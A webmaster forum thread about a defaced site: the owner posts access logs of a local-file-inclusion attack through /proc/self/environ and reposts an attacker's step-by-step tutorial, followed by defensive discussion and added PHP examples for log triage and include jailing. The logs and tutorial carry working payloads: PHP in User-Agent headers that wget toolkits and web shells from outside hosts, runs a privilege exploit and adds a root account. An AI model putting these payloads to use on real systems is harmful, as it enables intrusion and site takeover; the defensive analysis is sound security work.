Site hacked, found this in access-logs

camperjohn (Guru, Posts: 1127, Loc: San Diego) - Post 3+ Months Ago

About two weeks ago, someone hacked my front page on one of my older websites. Apparently, someone got in by using the User-Agent as PHP code. This must have been done with curl or some simple program.

Now why would the user agent string be executed as HTML/PHP? And why does he echo garbage strings in the PHP?

// Normal request
Code:
205.157.206.219 - - [16/Nov/2009:18:05:49 -0500] "GET /blahblah.html HTTP/1.1" 200 144 "http://www.unknowably.com/Bmw_Rear_Window.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"


// This is what I found in my access logs - notice the PHP is placed in the user agent (browser type)
Code:
201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"
201.6.154.39 - - [16/Nov/2009:16:37:13 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12575 "-" "<? $h=popen(\"echo $((77*77))\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?>"
201.6.154.39 - - [16/Nov/2009:16:37:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12733 "-" "<? echo 'Jm7oYPxw'; ?> <? $h=popen(\"uname -a\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'fZfdMjNd'; ?>"
201.6.154.39 - - [16/Nov/2009:16:38:05 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12666 "-" "<? echo 'J9es49Qm'; ?> <? $h=popen(\"uptime\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'UJMtRe29'; ?>"
201.6.154.39 - - [16/Nov/2009:16:38:12 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12968 "-" "<? echo 'Rl53gsAz'; ?> <? $h=popen(\"cat /etc/hosts\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'Lmb1NYyI'; ?>"
201.6.154.39 - - [16/Nov/2009:16:39:41 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12868 "-" "<? echo '3K4JgvX7'; ?> <? $h=popen(\"uname -a ; uptime ; id\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '6odTEzvh'; ?>"
201.6.154.39 - - [16/Nov/2009:16:44:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12594 "-" "<? echo 'IoSwzc0h'; ?> <? $h=popen(\"wget http://info-e.com.mx/~toylag/toolz/2009.tar\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '3cMfW7XL'; ?>"
201.6.154.39 - - [16/Nov/2009:16:44:22 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12955 "-" "<? echo 'XBninGnT'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'YEMt22x2'; ?>"
201.6.154.39 - - [16/Nov/2009:16:44:54 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12959 "-" "<? echo '5MKMYWBk'; ?> <? $h=popen(\"tar xvf 2009.tar\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'BFtHr8Qn'; ?>"
201.6.154.39 - - [16/Nov/2009:16:45:03 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12594 "-" "<? echo '0n3mWagt'; ?> <? $h=popen(\"./linux-sendpage\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'VEr5g9wj'; ?>"
201.6.154.39 - - [16/Nov/2009:16:45:06 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12651 "-" "<? echo 'Bl6HmVeh'; ?> <? $h=popen(\"id\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'HS7jzVdH'; ?>"
201.6.154.39 - - [16/Nov/2009:16:45:57 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12968 "-" "<? echo 'JYNsPmBZ'; ?> <? $h=popen(\"cat /etc/hosts\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'RMpMfe7h'; ?>"
201.6.154.39 - - [16/Nov/2009:16:46:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 16068 "-" "<? echo 'KkMbCOsL'; ?> <? $h=popen(\"cat /etc/passwd\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'ISiPyLMX'; ?>"
201.6.154.39 - - [16/Nov/2009:16:50:01 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12588 "-" "<? echo 'C8eJuF9D'; ?> <? $h=popen(\"echo jocampo:x:0:0::/:/bin/bash >> /etc/passwd; echo jocampo:::::::: >> /etc/shadow\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo '3gQFvfqB'; ?>"
201.6.154.39 - - [16/Nov/2009:16:50:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12643 "-" "<? echo '0jHPKqWZ'; ?> <? $h=popen(\"passwd jocampo\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'oCijfcxG'; ?>"
201.6.154.39 - - [16/Nov/2009:16:50:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 16013 "-" "<? echo 'BK0ee6Bc'; ?> <? $h=popen(\"cat /etc/passwd\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'ic6R1qB6'; ?>"
201.6.154.39 - - [16/Nov/2009:16:51:08 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 13009 "-" "<? echo 'BJVk1UaG'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'WItW5pXx'; ?>"
201.6.154.39 - - [16/Nov/2009:16:52:45 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12643 "-" "<? echo 'ya4nvi21'; ?> <? $h=popen(\"wget http://www.freewebtown.com/hacketoso/Defaced/defaced.txt\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'tiUecmLy'; ?>"
201.6.154.39 - - [16/Nov/2009:16:52:47 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12972 "-" "<? echo 'GfYgW1I6'; ?> <? $h=popen(\"ls\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'H6q9rX12'; ?>"
201.6.154.39 - - [16/Nov/2009:18:06:05 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 1452 "-" "<? echo 'Ye4LlBJx'; ?> <? $h=popen(\"wget http://www.freewebtown.com/hacketoso/Defaced/force.htm\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'WED82Vm9'; ?>"


I already fixed this to not allow a file with .. to be included. But still, what is proc/self/environ, and why does it execute code from this request?
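The access-log pattern above, turned into a triage check a defender can run over the raw log, as an added example that is not part of the original post; the regex, flag names and the way the command is pulled out of the User-Agent are my own, and the sample lines are copied from the post (first User-Agent shortened).

```php
<?php
// Added example, not code from the thread: triage Apache combined-format log
// lines for the pattern seen in the post (traversal to /proc/self/environ in
// the request plus PHP open tags in the User-Agent) and recover the command
// wrapped in popen()/system(), so the attacker's timeline can be reconstructed.

const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+) '
                  . '"((?:[^"\\\\]|\\\\.)*)" "((?:[^"\\\\]|\\\\.)*)"$/';

function parse_combined(string $line): ?array
{
    if (!preg_match(COMBINED_RE, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[7],
            'ua' => stripslashes($m[8])];          // undo Apache's \" escaping
}

// Indicators worth alerting on; decode the path so %2e%2e/ is caught as well.
function classify(array $e): array
{
    $flags = [];
    $path = rawurldecode($e['path']);
    if (strpos($path, '../') !== false || stripos($path, '/proc/self/environ') !== false) {
        $flags[] = 'lfi-traversal';
    }
    if (preg_match('/<\?(php\b|=|\s)/i', $e['ua'])) {
        $flags[] = 'php-in-user-agent';
    }
    return $flags;
}

// The string handed to a PHP process-execution function inside the UA, if any.
function extract_command(string $ua): ?string
{
    $re = '/\b(?:popen|system|exec|shell_exec|passthru)\s*\(\s*(["\'])(.*?)\1/s';
    return preg_match($re, $ua, $m) ? $m[2] : null;
}

function triage(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $e = parse_combined($line);
        if ($e === null || ($flags = classify($e)) === []) {
            continue;
        }
        $hits[] = ['ip' => $e['ip'], 'time' => $e['time'], 'status' => $e['status'],
                   'flags' => $flags, 'command' => extract_command($e['ua'])];
    }
    return $hits;
}

// Sample lines copied from the post: one normal request, three hostile ones.
$sample = <<<'LOG'
205.157.206.219 - - [16/Nov/2009:18:05:49 -0500] "GET /blahblah.html HTTP/1.1" 200 144 "http://www.unknowably.com/Bmw_Rear_Window.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
201.6.154.39 - - [16/Nov/2009:16:37:11 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 54929 "-" "<? echo 'WSRsTn8e'; ?> <? phpinfo(); ?> <? echo 'TQaN6TK7'; ?>"
201.6.154.39 - - [16/Nov/2009:16:37:13 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12575 "-" "<? $h=popen(\"echo $((77*77))\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?>"
201.6.154.39 - - [16/Nov/2009:16:37:18 -0500] "GET /?file=../../../../proc/self/environ HTTP/1.1" 200 12733 "-" "<? echo 'Jm7oYPxw'; ?> <? $h=popen(\"uname -a\", \"r\");while(!feof($h)){$l=fread($h, 2024);echo $l;}?> <? echo 'fZfdMjNd'; ?>"
LOG;
foreach (triage(explode("\n", $sample)) as $h) {
    printf("%s %s %d [%s] %s\n", $h['time'], $h['ip'], $h['status'],
           implode(',', $h['flags']), $h['command'] ?? '(no command: recon only)');
}
```

A 200 status on a flagged request means the include actually succeeded rather than merely being attempted, which is what distinguishes this log from ordinary scanner noise.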

camperjohn (Guru, Posts: 1127, Loc: San Diego) - Post 3+ Months Ago

http://rstcenter.com/forum/16406-shell- ... p-step.rst

joebert (Genius, Posts: 13502, Loc: Florida) - Post 3+ Months Ago

Ouch.

Interesting link you have there. I'm afraid to click it because that site doesn't look very trustworthy, and I'm afraid to post the explanation it has here so people don't have to risk going there, because they seem like the type who would attack me for trying to protect others.

camperjohn (Guru, Posts: 1127, Loc: San Diego) - Post 3+ Months Ago

Shell via LFI - proc/self/environ method
Author : SirGod
http://www.insecurity-ro.org
http://www.h4cky0u.org
sirgod08@gmail.com

1 - Introduction
2 - Finding LFI
3 - Checking if proc/self/environ is accessible
4 - Injecting malicious code
5 - Access our shell
6 - Shoutz

>> 1 - Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code into proc/self/environ. It is a step-by-step tutorial.

>> 2 - Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.

http://www.website.com/view.php?page=contact.php

- Now let's replace contact.php with ../ so the URL will become

http://www.website.com/view.php?page=../

and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

there is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.

- Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:

http://www.website.com/view.php?page=../../../etc/passwd

we got an error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

http://www.website.com/view.php?page=../../../../../etc/passwd

we successfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ

http://www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

>> 4 - Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:

http://www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in the User-Agent field write the following code:

<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>

Then submit the request.

Our command will be executed through system() (it will download the txt shell from http://hack-bay.com/Shells/gny.txt and save it as shell.php in the website directory), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

>> 5 - Access our shell

- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.

http://www.website.com/shell.php

Our shell is there. Injection was successful.

>> 6 - Shoutz

Shoutz to all members of http://www.insecurity-ro.org and http://www.h4cky0u.org.

joebert (Genius, Posts: 13502, Loc: Florida) - Post 3+ Months Ago

Sometimes I wonder if you've got people lining up around the block to attack you, John. lol

I guess the important lesson here is to jail your includes. Not just by looking for the /. characters in the front either. Consider a path like this.

Code:
innocent/looking/../../../not-so-innocent


I wonder if that would resolve anywhere.
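An include jail of the kind joebert describes, as an added example that is not code from the thread or from camperjohn's site: it judges the canonical path realpath() produces rather than the characters in the request, so the traversal above is refused while a legitimate name containing a dot still works. The pages directory, file names and the .html allowlist are assumptions made up for the demo.

```php
<?php
// Added example, not code from the thread: an include "jail" that judges the
// resolved path, not the characters in the request, so both joebert's
// "innocent/looking/../../../not-so-innocent" and the log's
// "../../../../proc/self/environ" are refused while a legitimate name that
// contains a dot still works. Directory and file names are hypothetical.

function resolve_include(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", follows symlinks and fails for missing files,
    // so the jail check sees the path include() would actually open.
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($resolved === false) {
        return null;                                  // missing file: never include
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;                                  // canonical path left the jail
    }
    if (!is_file($resolved) || pathinfo($resolved, PATHINFO_EXTENSION) !== 'html') {
        return null;                                  // allow only the expected type
    }
    return $resolved;
}

// Throwaway layout: <tmp>/pages/Bmw_Rear_Window.html is the only legal include;
// <tmp>/not-so-innocent sits one level above the jail.
$root = sys_get_temp_dir() . '/jail_demo_' . bin2hex(random_bytes(4));
mkdir("$root/pages/innocent/looking", 0700, true);
file_put_contents("$root/pages/Bmw_Rear_Window.html", "<p>ok</p>\n");
file_put_contents("$root/not-so-innocent", "secret\n");

$requests = [
    'Bmw_Rear_Window.html',                        // legitimate, dot in the name
    'innocent/looking/../../Bmw_Rear_Window.html', // odd, but resolves inside: allowed
    'innocent/looking/../../../not-so-innocent',   // joebert's case: escapes the jail
    '../../../../proc/self/environ',               // the request from the access log
    '../../../../etc/passwd',
];
foreach ($requests as $r) {
    $hit = resolve_include("$root/pages", $r);
    printf("%-45s => %s\n", $r, $hit === null ? 'REFUSED' : 'include ' . basename($hit));
}

// Remove the throwaway layout.
foreach (["$root/pages/Bmw_Rear_Window.html", "$root/not-so-innocent"] as $f) { unlink($f); }
foreach (["$root/pages/innocent/looking", "$root/pages/innocent", "$root/pages", $root] as $d) { rmdir($d); }
```

The caller should include the absolute path the function returns, never the raw request; an explicit allowlist mapping page names to files is stricter still and avoids path logic entirely.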

joebert (Genius, Posts: 13502, Loc: Florida) - Post 3+ Months Ago

I forgot to mention, the first thing I thought of when I started reading this thread was that perhaps a traffic statistics page somewhere wasn't HTML-encoding the PHP markers in the static HTML pages that were being saved, and then maybe the PHP interpreter was set up to parse *.html files as PHP.

camperjohn (Guru, Posts: 1127, Loc: San Diego) - Post 3+ Months Ago

I thought I did jail the includes; I even did a file_exists in that folder. But this was on an older website (6+ years) and the dot (.) was a valid character, so the combo ../../ wasn't trapped.

Anyway, glad the hacker just changed the front page, and didn't delete the website or more.

Funny thing is, he could have just changed my Google AdSense ID number to skim ads and make $50 +/- a day, and I probably wouldn't have noticed for a long time. If he had changed it to skim 100% of the ads, I would have been wtf, but he could have used rand(0,5) == 0 and taken 20% of my income for a long time and I may never have noticed...

joebert (Genius, Posts: 13502, Loc: Florida) - Post 3+ Months Ago

It's funny you mention the ads. I had a GoDaddy account compromised some time ago and they did exactly that with the ads, but they replaced the entire AdSense code with some sort of malware link and an image the same size as the AdSense.

I didn't realize it for 6 months because the genius applied it in template files I didn't even use. I guess they were looking for pages that don't get much traffic to stay under the radar, and stay under the radar they did.

joebert (Genius, Posts: 13502, Loc: Florida) - Post 3+ Months Ago

Now that you mention it, it would be awesome if Google's Webmaster Tools had a way to link AdSense accounts with Webmaster Tools so you could monitor the AdSense IDs that appear on the site.

I guess that wouldn't help much with the problem I had where the AdSense was removed completely, though if it led to a dive in impressions I suppose it would be cause for concern and lead to seeing it, like you said.

camperjohn (Guru, Posts: 1127, Loc: San Diego) - Post 3+ Months Ago

Yes, if my ads took a dive to 0, then I would figure it out. But if someone made it only 30% less, then I would have just got back to work to jump my traffic again. And I would have inadvertently helped his traffic!

genux (Graduate, Posts: 106, Loc: UK) - Post 3+ Months Ago

Very cool post, camperjohn, about how to hack... really enjoyed reading it.

sheva249 (Novice, Posts: 20) - Post 3+ Months Ago

Thanks for the resourceful info. Also liked the tut very much.

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.